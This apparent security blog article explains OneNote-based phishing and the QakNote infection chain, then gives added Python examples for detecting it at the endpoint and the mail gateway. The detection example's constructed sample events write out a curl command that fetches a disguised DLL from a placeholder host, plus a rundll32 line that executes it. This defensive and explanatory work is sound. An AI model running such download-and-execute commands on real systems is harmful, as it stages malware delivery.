March 21, 2023 By Doug Bonderud 4 min read

There are plenty of phish in the digital sea, and attackers are constantly looking for new bait that helps them bypass security perimeters and land in user inboxes.

Their newest hook? OneNote documents. First noticed in December 2022, this phishing framework has seen success in fooling multiple antivirus (AV) tools by using .one file extensions, and January 2023 saw an attack uptick as compromises continued.

While this novel notes approach will eventually be phased out as phishing defenses catch up, current conditions make it worthwhile to understand how this attack works, what it means for organizations and what they can do to stay safe.

From many to .One — the impact of macro-economics

In July 2022, Microsoft disabled macros by default in all Office document types. Despite a temporary rollback in response to user concerns, auto-blocking of macros is now standard operating practice. While users can enable them after the fact, malicious actors can no longer rely on macros to make their phishing efforts easier.

To combat this cybersecurity change, attackers went looking for a new approach and found it in OneNote documents. For cyber criminals, the benefits of OneNote are two-fold. The first is novelty: Businesses aren’t expecting attacks in .one files. Next is efficacy: As noted by ZDNET, multiple AV tools did not flag OneNote attachments as malicious, even when they contained malware payloads.

How OneNote malware works

The first OneNote attacks were discovered in December 2022 as attackers experimented with new phishing methods. As of February 2023, more than 60 attacks were confirmed on companies in the manufacturing, industrial and education sectors.

Common payloads attached to malicious documents include AsyncRAT, AgentTesla, Doubleback and Redline. Malicious actors also created a mix of specific and general compromise campaigns. In the case of industrial and manufacturing firms, attachments appeared to be documents containing details about machine parts or specifications. Educational institutions were on the receiving end of more widespread campaigns that included fictitious invoices or offers of Christmas bonuses.

Despite the new file format, OneNote phishing attacks play out much like their more familiar counterparts. Victims must open the email message, open the attachment and then click through on malicious links. While OneNote does warn users about the risk of suspicious document links, this doesn’t always have the intended effect. Consider that 45% of all alerts are false positives and that one-third of IOT security staff ignore alerts if their queue is already full. Given that even security professionals don’t always investigate potential problems because they’re too busy or perceived threats may simply be common errors, it’s hardly surprising that front-line staff feel confident clicking through to OneNote documents despite system warnings.

Once inside a company’s network, malicious payloads delivered by OneNote documents can find, collect and exfiltrate sensitive data, including usernames, passwords and protected files.

Duck, duck, lose

Efforts are also underway to expand the impact of OneNote attacks by bundling documents with the QBot malware payload. Originally a banking trojan discovered in 2007, QBot — also called QakBot — has evolved into an initial access framework. As part of a phishing campaign, it takes on the task of gaining initial device access, in turn enabling attackers to load and execute additional malware payloads.

As noted by SC Magazine, a cyber crime group known as TA577 has leveraged QBot-based attacks to gain system access, then steal and sell collected data to other cyber criminals. Known as QakNote, this new attack approach has quickly gained ground. Since early February, attackers have pressed their advantage to hook as many phish as possible before the pond dries up.

In practice, QakNote attacks start with an HTML application (HTA) embedded in the OneNote document; when users click the malicious link, the HTA script runs the curl.exe application to download a DLL file that contains QBot. This file is placed in the C:\ProgramData folder and executed using Rundll32.exe. Finally, the payload injects itself into AtBroker.exe, the Windows Assistive Technology broker process, to conceal itself from security tools.
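The chain above gives a defender three observable stages: curl.exe spawned by an HTA host writing a DLL under C:\ProgramData, rundll32.exe executing a DLL from that folder, and an injection into AtBroker.exe. The following is an added detection example, not code from the article or from any vendor: it runs that three-stage logic over normalised endpoint events. The event field names (kind, image, parent_image, cmdline, target_image) are an assumed normalisation layer rather than Sysmon's native schema, the use of mshta.exe as the HTA host is a general Windows fact rather than something the article states, the 10-minute window is an assumed tuning value, and all sample events are constructed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# The two file-system facts the article gives: a DLL dropped under
# C:\ProgramData, and a remote URL fetched by curl.exe.
PROGRAMDATA_DLL = re.compile(r'c:\\programdata\\[^\s"]+\.dll', re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)

WINDOW_SECONDS = 600  # stages must fall within 10 minutes (assumed tuning value)


@dataclass
class Event:
    """One normalised endpoint event (assumed schema, not Sysmon's native one)."""
    ts: int                 # epoch seconds
    host: str
    kind: str               # "process" (creation) or "remote_thread" (injection)
    image: str              # process that performed the action
    parent_image: str = ""  # parent of a created process
    cmdline: str = ""
    target_image: str = ""  # injected-into process, for kind == "remote_thread"


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def match_stage(e: Event) -> str:
    """Map one event to a stage of the chain, or '' if it matches none."""
    img, parent = _name(e.image), _name(e.parent_image)
    if e.kind == "process":
        # Stage 1: the HTA (hosted by mshta.exe) runs curl.exe to fetch a DLL into C:\ProgramData
        if (img == "curl.exe" and parent == "mshta.exe"
                and REMOTE_URL.search(e.cmdline) and PROGRAMDATA_DLL.search(e.cmdline)):
            return "curl_dll_to_programdata"
        # Stage 2: rundll32.exe executes a DLL out of C:\ProgramData
        if img == "rundll32.exe" and PROGRAMDATA_DLL.search(e.cmdline):
            return "rundll32_programdata_dll"
    elif e.kind == "remote_thread":
        # Stage 3: the loaded payload injects into AtBroker.exe
        if img == "rundll32.exe" and _name(e.target_image) == "atbroker.exe":
            return "inject_atbroker"
    return ""


def detect(events: List[Event]) -> Dict[str, dict]:
    """Per host, collect matched stages in time order and alert when two or
    more distinct stages occur within WINDOW_SECONDS of the first one."""
    per_host: Dict[str, list] = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.ts):
        per_host.setdefault(e.host, [])          # hosts with no hits still get a verdict
        stage = match_stage(e)
        if stage:
            per_host[e.host].append((e.ts, stage))
    results = {}
    for host, hits in per_host.items():
        stages: List[str] = []
        first_ts = hits[0][0] if hits else 0
        for ts, stage in hits:
            if ts - first_ts <= WINDOW_SECONDS and stage not in stages:
                stages.append(stage)
        results[host] = {"stages": stages, "alert": len(stages) >= 2}
    return results


# Constructed sample telemetry (not real logs): ws-042 shows the full chain,
# ws-017 shows benign uses of the same binaries. The DLL export name "Start"
# and all paths/URLs are placeholders.
SAMPLE_EVENTS = [
    Event(1000, "ws-042", "process", r"C:\Windows\System32\mshta.exe",
          parent_image=r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
          cmdline=r'mshta.exe "C:\Users\alice\AppData\Local\Temp\OneNote\spec.hta"'),
    Event(1003, "ws-042", "process", r"C:\Windows\System32\curl.exe",
          parent_image=r"C:\Windows\System32\mshta.exe",
          cmdline=r"curl.exe -o C:\ProgramData\update.dll http://example.invalid/update.png"),
    Event(1005, "ws-042", "process", r"C:\Windows\System32\rundll32.exe",
          parent_image=r"C:\Windows\System32\mshta.exe",
          cmdline=r"rundll32.exe C:\ProgramData\update.dll,Start"),
    Event(1009, "ws-042", "remote_thread", r"C:\Windows\System32\rundll32.exe",
          target_image=r"C:\Windows\System32\AtBroker.exe"),
    Event(2000, "ws-017", "process", r"C:\Windows\System32\curl.exe",
          parent_image=r"C:\Windows\System32\cmd.exe",
          cmdline=r"curl.exe -o C:\Users\bob\notes.txt https://example.invalid/notes.txt"),
    Event(2010, "ws-017", "process", r"C:\Windows\System32\rundll32.exe",
          parent_image=r"C:\Windows\explorer.exe",
          cmdline=r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for host, verdict in detect(SAMPLE_EVENTS).items():
        print(host, verdict)
```

Requiring two stages rather than one keeps the rule from firing on the benign rundll32.exe and curl.exe invocations on ws-017, while the parent-process and C:\ProgramData conditions are what separate the OneNote chain from ordinary use of the same signed binaries.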

Foiling the phish

Recognizing OneNote issues is the first step in reducing risk. But what else can companies do to limit the chance of compromise?

Thankfully, the novel nature of the note attack doesn’t change the overall security strategy. First, companies need to implement robust spam filters to keep the bulk of potentially problematic emails out of user inboxes. This approach works well because it doesn’t just emphasize detecting the malicious nature of OneNote documents. Rather, it focuses on identifying messages as spam, which is often a more straightforward task.
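A mail-gateway check complements that spam-first strategy by catching the attachment type itself. The following is an added example, not code from the article or from any mail product: it parses a raw MIME message with Python's standard library and flags OneNote attachments both by the .one extension and by the file-type GUID in the file header, so a renamed .one file declared as a PDF is still caught. The header GUID is the .one guidFileType value from Microsoft's MS-ONESTORE specification; the sample message and all addresses and file names are constructed.

```python
import uuid
from email import message_from_bytes, policy
from email.message import EmailMessage
from typing import List

# .one file-type GUID (MS-ONESTORE Header.guidFileType), stored little-endian on disk.
ONE_MAGIC = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le
RISKY_EXTENSIONS = {".one"}


def attachment_findings(raw: bytes) -> List[dict]:
    """Return one finding per attachment that looks like a OneNote file."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").strip()
        payload = part.get_payload(decode=True) or b""
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        reasons = []
        if ext in RISKY_EXTENSIONS:
            reasons.append(f"extension {ext}")
        if payload[:16] == ONE_MAGIC:           # content check ignores the declared name/type
            reasons.append("onenote file header")
        if reasons:
            findings.append({"filename": name,
                             "content_type": part.get_content_type(),
                             "reasons": reasons})
    return findings


def verdict(raw: bytes) -> str:
    return "quarantine" if attachment_findings(raw) else "deliver"


def build_sample() -> bytes:
    """Constructed lure modelled on the article's 'machine parts' theme."""
    m = EmailMessage()
    m["From"] = "vendor@example.invalid"
    m["To"] = "buyer@example.invalid"
    m["Subject"] = "Machine part specifications"
    m.set_content("Please see the attached specifications.")
    fake_one = ONE_MAGIC + b"\x00" * 48   # header only; not a real notebook
    m.add_attachment(fake_one, maintype="application", subtype="octet-stream",
                     filename="parts-spec.one")
    m.add_attachment(fake_one, maintype="application", subtype="pdf",
                     filename="invoice.pdf")          # renamed OneNote file
    m.add_attachment("plain notes", filename="notes.txt")   # benign
    return m.as_bytes()


def build_benign() -> bytes:
    m = EmailMessage()
    m["From"] = "colleague@example.invalid"
    m["To"] = "buyer@example.invalid"
    m["Subject"] = "Meeting notes"
    m.set_content("Notes attached.")
    m.add_attachment("plain notes", filename="notes.txt")
    return m.as_bytes()


if __name__ == "__main__":
    for f in attachment_findings(build_sample()):
        print(f)
    print(verdict(build_sample()), verdict(build_benign()))
```

Checking the header as well as the extension matters because the declared content type and file name are attacker-controlled; the 16-byte GUID is what OneNote itself keys on, so a gateway rule built on it does not depend on AV engines recognising the attachment as malicious.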

Next is cybersecurity education which focuses on secure computing habits. While this includes reminders to heed security warnings, it’s also critical for companies to offer more proactive advice that helps staff spot phishing efforts more easily. As social engineering efforts become more in-depth, this education is shifting away from more generic recommendations such as seeking out grammar or spelling errors. Instead, it takes a more considered approach that focuses on questions. Common questions for staff include: Why am I receiving this email? Do I know the sender? Was I asking for these documents? What action are they asking me to take? It’s also worth running regular phishing exercises to see if staff can spot security risks before they click through.

Slow and steady

Lastly, enterprises need to prioritize the value of slowing down when it comes to improving security. This is because company culture often prioritizes speed. Staff want to meet deadlines and avoid setbacks on current projects, meaning that potential security threats may be sidelined in favor of keeping tasks on track. To address this, IT teams need to seek out C-suite support for policies that require staff to report potential problems and make it clear that this reporting takes priority over other tasks. It’s also worth implementing a system that allows staff to quickly flag emails for IT review.

Bottom line? Security teams need to take note and take action. The shift away from macro-based malware may have closed one digital door, but it opened a window for new phishing frameworks.
